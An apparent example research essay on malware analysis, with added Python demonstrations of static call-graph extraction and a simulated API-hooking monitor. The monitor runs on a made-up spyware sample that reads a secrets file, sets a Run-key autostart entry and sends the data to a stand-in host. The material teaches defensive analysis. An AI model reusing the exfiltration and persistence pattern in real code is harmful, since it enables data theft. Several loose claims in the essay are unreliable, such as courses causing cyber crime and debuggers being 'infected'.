Malware Analysis Research Papers Example
Over the years, the world has seen a great technological revolution. Innovations such as the introduction of computers have been accompanied by vices such as cyber crime. In recent years, questions have been raised about the ability of small groups of individuals to break into the online accounts of organizations and institutions and distort or destroy information. The introduction of computing courses in educational institutions is also one of the major factors behind the increase in cyber crime. Internet services and other digital equipment have escalated the number of criminal incidents in cyberspace. Notably, the digital crimes committed by individuals include Internet fraud, of which the most common forms are credit card fraud, advance fee fraud, illegal online gambling and the setting up of fraudulent websites. Cyber criminals have also taken part in network intrusion and hacking, the spreading of viral infections across networks, cyber piracy and terrorism, and the distribution of child pornography across networks (Taylor, 2011). Cyber crime is one of the challenges that law-enforcement agencies face globally, because evidence of cyber crimes is very hard to collect, and investigating cyberspace crimes and linking them to one another is nearly impossible. Although several tools facilitate cyber crime, one of the tools of choice for cyber criminals is malware. The term 'malware' stands for any malicious software that cyber criminals use to disrupt computer operations. Criminals may also use malware to gather sensitive information and to gain easy access to private computer systems. The use of malware is malicious and violates the rules that computer users are expected to abide by.
Every organization strives to eradicate malware infections, as they are a big threat to computer systems.
Malware Analysis Procedures
Notably, malware analysis, as currently adopted by several organizations and companies, refers to the careful study and examination of a piece of malware. The study of malware involves dissecting its different components and studying how it behaves on the host operating system of a computer. In organizations, if malware is detected on computer systems, computer experts such as software engineers are called upon. Their role is to ensure that the detected malware is completely eliminated from the computer systems. There are two approaches to analyzing malware. The first approach used by software engineers is static analysis, which analyzes malware without executing it. Static analysis uses techniques that are applicable to different representations of a computer program. For example, when the source code is available, static analysis tools can trace memory corruption flaws, and this helps prove the correctness of models for a given computer system. The other representation to which static analysis techniques are applicable is the binary representation of a program. It is worth noting that when the source code of a program is compiled into a binary executable, some information may be lost (Kendall & McMillan, 2007). This is disadvantageous to the malware analysis process, as the loss of information complicates the task of analyzing the code. Static analysis techniques can also be applied to extract useful information about a program; for instance, call graphs give the analyst an overview of which functions may be invoked, and from where, in a given code base. However, the use of static analysis for analyzing malware faces various challenges.
To start with, it should be noted that the source code of malicious software samples is not readily available, and this reduces the applicability of static analysis techniques. Besides, the analysis of binaries is often accompanied by intricate challenges. For example, the analysis of binaries requires disassembling the program, and this leads to ambiguous results, especially in situations where the binary applies self-modifying code techniques. The other challenge facing the use of static analysis is that there are malware samples whose behaviour cannot be determined statically (Kendall & McMillan, 2007).
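As an added illustration of the source-code case discussed above (example code written for this page, not from Kendall & McMillan or any tool named in the text): Python's ast module is used to build a call graph from a program's source and then to ask which call chains from an entry point can reach a network sink. The analyzed program is a constructed snippet that is only parsed, never executed; its function names and the 203.0.113.10 address are made up.

```python
"""Added example (not part of the paper): static call-graph extraction from
source code and a reachability query over it. The input program below is a
constructed snippet; it is parsed with ast but never run."""
import ast

# Constructed program under analysis. It is text only and is never executed.
CONSTRUCTED_SOURCE = '''
import socket

def read_config(path):
    with open(path) as f:
        return f.read()

def send_report(host, payload):
    s = socket.socket()
    s.connect((host, 443))
    s.send(payload)

def load():
    return read_config("settings.ini")

def main():
    cfg = load()
    send_report("203.0.113.10", cfg.encode())
'''


def _call_name(node: ast.Call) -> str:
    """Render the callee of a Call node as dotted text, e.g. 's.connect'.
    Calls through a local variable keep the variable's name: without type
    information the analysis cannot know that 's' is a socket, which is one
    example of the information a purely syntactic view lacks."""
    func = node.func
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
        return ".".join(reversed(parts))
    return "<dynamic>"  # e.g. calling the result of another call


def build_call_graph(source: str) -> dict:
    """Map each function defined in `source` to the set of callee names that
    appear syntactically inside its body."""
    tree = ast.parse(source)
    graph = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.FunctionDef):
            graph[node.name] = {_call_name(c) for c in ast.walk(node)
                                if isinstance(c, ast.Call)}
    return graph


def paths_to(graph: dict, start: str, is_sink) -> list:
    """Depth-first search for call chains from `start` to any callee for
    which is_sink(name) holds. Cycles are cut by never revisiting a function
    already on the current path."""
    found = []

    def dfs(func, path):
        for callee in sorted(graph.get(func, ())):
            if is_sink(callee):
                found.append(path + [callee])
            elif callee in graph and callee not in path:
                dfs(callee, path + [callee])

    dfs(start, [start])
    return found


if __name__ == "__main__":
    graph = build_call_graph(CONSTRUCTED_SOURCE)
    for fn, callees in graph.items():
        print(f"{fn} -> {sorted(callees)}")
    network = lambda name: name.endswith((".connect", ".send"))
    for chain in paths_to(graph, "main", network):
        print("network reachable via:", " -> ".join(chain))
```

The graph shows that `main` reaches the socket calls only through `send_report`, while `load` and `read_config` never do; that is the kind of "what is invoked, and from where" overview the text attributes to call graphs. Note that the same approach on a compiled binary first needs a disassembler to recover the call instructions, and indirect calls or self-modifying code leave it with the ambiguity the text describes.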
Software engineers in organizations can also use dynamic malware analysis techniques. Dynamic analysis examines the actions performed by a program while it is being executed. There are four ways in which dynamic analysis techniques help in the analysis of malware: function call monitoring, function parameter analysis, information flow tracking, and instruction trace. A function is a section of code that performs a specific task, and the use of functions makes software easier to maintain and analyze. As a way of analyzing software, function calls are monitored by hooking them, which is helpful for recording the invocations made by a program to a log file or for analyzing its input parameters. Function parameter analysis then helps in malware analysis by examining the concrete values passed to and returned by the monitored functions. Information flow tracking involves propagating data deemed interesting throughout the system while a program that manipulates the data is executed, so that the analyst can see where the data ends up. Instruction trace, on the other hand, records the sequence of instructions that a malware sample executes during its analysis. The instruction trace contains important information that is vital for malware analysis (Kendall & McMillan, 2007).
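To make the four techniques concrete, here is an added example written for this page (not code from Kendall & McMillan, Anubis or any other tool the text names). A small monitor hooks every entry of an API table before a sample runs, the way a sandbox hooks a program's imported functions, and then answers the four questions from its log: which calls were made in what order (instruction-trace analogue), how often (call monitoring), with what arguments (parameter analysis), and whether data read by a source call later reached a sink call (information flow tracking, done here by coarse content matching rather than true taint propagation). The API names imitate Win32 calls but are simulated stand-ins, and the sample is made up; nothing real is touched.

```python
"""Added example (not from the paper): a toy hooking monitor demonstrating
function call monitoring, parameter analysis, information flow tracking and
an instruction-trace analogue on a constructed, fully simulated sample."""
import functools
from collections import Counter
from dataclasses import dataclass


@dataclass
class CallRecord:
    """One hooked invocation, i.e. one line of the log file the text mentions."""
    name: str
    args: tuple
    result: object


class CallMonitor:
    """Replaces each entry of an API table with a logging wrapper, the way a
    sandbox hooks a program's imported functions before letting it run."""

    def __init__(self, api: dict):
        self.api = api
        self.log = []
        for name in list(api):
            self._hook(name)

    def _hook(self, name: str) -> None:
        original = self.api[name]

        @functools.wraps(original)
        def wrapper(*args):
            result = original(*args)  # run the (here: simulated) real call
            self.log.append(CallRecord(name, args, result))
            return result

        self.api[name] = wrapper

    def trace(self) -> list:
        """Instruction-trace analogue: the ordered sequence of calls made."""
        return [rec.name for rec in self.log]

    def call_counts(self) -> dict:
        """Function call monitoring: how often each API was invoked."""
        return dict(Counter(self.trace()))

    def parameter_indicators(self) -> list:
        """Function parameter analysis: inspect the concrete argument values."""
        findings = []
        for rec in self.log:
            if rec.name == "RegSetValue" and "\\CurrentVersion\\Run" in rec.args[0]:
                findings.append(f"persistence: Run key {rec.args[1]!r} -> {rec.args[2]!r}")
            if rec.name == "HttpSendRequest":
                findings.append(f"network: request to {rec.args[0]!r}")
        return findings

    def information_flows(self, sources=("ReadFile",),
                          sinks=("HttpSendRequest", "WriteFile")) -> list:
        """Coarse information flow tracking: does data returned by a source
        call appear, byte for byte, inside a later sink call's arguments?
        A real taint tracker propagates labels through every operation."""
        tainted, flows = [], []
        for rec in self.log:
            if rec.name in sources and rec.result:
                tainted.append((f"{rec.name}({rec.args[0]!r})", rec.result))
            elif rec.name in sinks:
                for arg in rec.args:
                    if not isinstance(arg, bytes):
                        continue
                    for label, data in tainted:
                        if data in arg:
                            flows.append((label, f"{rec.name}({rec.args[0]!r})"))
        return flows


def constructed_api() -> dict:
    """Constructed stand-ins for Win32-style calls. They only return values;
    no file, registry key or socket is ever touched."""
    return {
        "Sleep": lambda ms: None,
        "ReadFile": lambda path: (b"user=alice;token=CONSTRUCTED"
                                  if path.endswith("secrets.txt") else b""),
        "WriteFile": lambda path, data: len(data),
        "RegSetValue": lambda key, name, value: 0,
        "HttpSendRequest": lambda url, body: 200,
    }


def constructed_sample(api: dict) -> None:
    """Made-up sample behaving like the spyware described in the text: read a
    file, register for autostart, send the data out. Purely simulated."""
    api["Sleep"](1000)
    secret = api["ReadFile"](r"C:\Users\victim\secrets.txt")
    api["RegSetValue"](r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
                       "updater", r"C:\Temp\upd.exe")
    api["HttpSendRequest"]("http://upload.example.invalid/collect", b"data=" + secret)


def analyze(sample=constructed_sample) -> CallMonitor:
    """Install the hooks first, then run the sample under observation."""
    api = constructed_api()
    monitor = CallMonitor(api)
    sample(api)
    return monitor


if __name__ == "__main__":
    m = analyze()
    print("trace:", " -> ".join(m.trace()))
    print("counts:", m.call_counts())
    for line in m.parameter_indicators():
        print(line)
    for src, dst in m.information_flows():
        print(f"flow: {src} => {dst}")
```

The order matters: hooks go in before the sample executes, since a call made before its wrapper is installed never reaches the log. The flow report links the file read to the outgoing request even though the sample prepended `data=` to the bytes, because the check is a substring match; a sample that encrypted or encoded the data before sending it would defeat this coarse check, which is exactly why the text describes propagating the "interesting" data through the system rather than comparing values after the fact.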
Malware Analysis Environment and Tools
Before determining the malware analysis environment and tools, it is important to examine the various types of mobile malware infections. To begin with, a worm is a common malware infection that is prevalent in networked environments; it can be defined as a program with the ability to run independently and, at the same time, propagate a fully working version of itself to other systems or machines. Worms can cause significant interference with computer systems. The other mobile malware infection is the virus. Experts define a virus as code that adds itself to the programs of other computer systems. In contrast to the worm, the virus does not run independently but requires the activation of its host program in order to function. Viruses also propagate themselves to infect any host they come across. The other malware infection is the Trojan horse, which, though it pretends to be useful, performs actions deemed malicious in the background of the computer system. Another malicious software commonly used by criminals is known as spyware; its function is to retrieve information from a victim's system and transfer the information to the attacker. Spyware has been used to steal account information such as bank account details. Other minor malicious software infections include bots and rootkits. During malware analysis, the environments affected by malware infections are always the center of focus. Malware infections readily affect environments such as hardware, which is therefore examined during malware analysis (Van Randwyk et al., 2008). The other environment affected by malware infections is external applications; a typical example of such an application is a debugger. The infection of debuggers by malware also makes them a center of focus during malware analysis. It should be noted that effective malware analysis requires specific tools.
One of the key tools in the process is Anubis (Analysis of Unknown Binaries). Anubis analyzes malware by monitoring the invocation of Windows API functions (Egele et al., 2012). It also monitors the system service calls to the Windows Native API. The other vital tool in malware analysis is multiple path exploration, which explores multiple execution paths of Windows binaries, thus preventing a malware sample from postponing its malicious activities to a later date (Egele et al., 2012). The Norman Sandbox is another tool; it executes a malware sample in a tightly controlled virtual environment that simulates a Windows operating system (Egele et al., 2012).
The knowledge of a malware analyst is the most important factor in thorough and accurate malware analysis. Essentially, a malware analyst should have strong skills in programming. Besides, he or she should be detail oriented (Skoudis & Zeltser, 2004). There is a misconception that a malware analyst should be an elite hacker, and this is not the case.
References
Egele, M., Scholte, T., Kirda, E., & Kruegel, C. (2012). A survey on automated dynamic malware-analysis techniques and tools. ACM Computing Surveys (CSUR), 44(2), Article 6.
Kendall, K., & McMillan, C. (2007). Practical malware analysis. In Black Hat Conference, USA.
Skoudis, E., & Zeltser, L. (2004). Malware: Fighting malicious code. Upper Saddle River, NJ: Prentice Hall PTR.
Taylor, R. W. (2011). Digital crime and digital terrorism. Boston: Prentice Hall.
Van Randwyk, J., Chiang, K., Lloyd, L., & Vanderveen, K. (2008, October). Farm: An automated malware analysis environment. In 2008 42nd Annual IEEE International Carnahan Conference on Security Technology (ICCST 2008) (pp. 321-325). IEEE.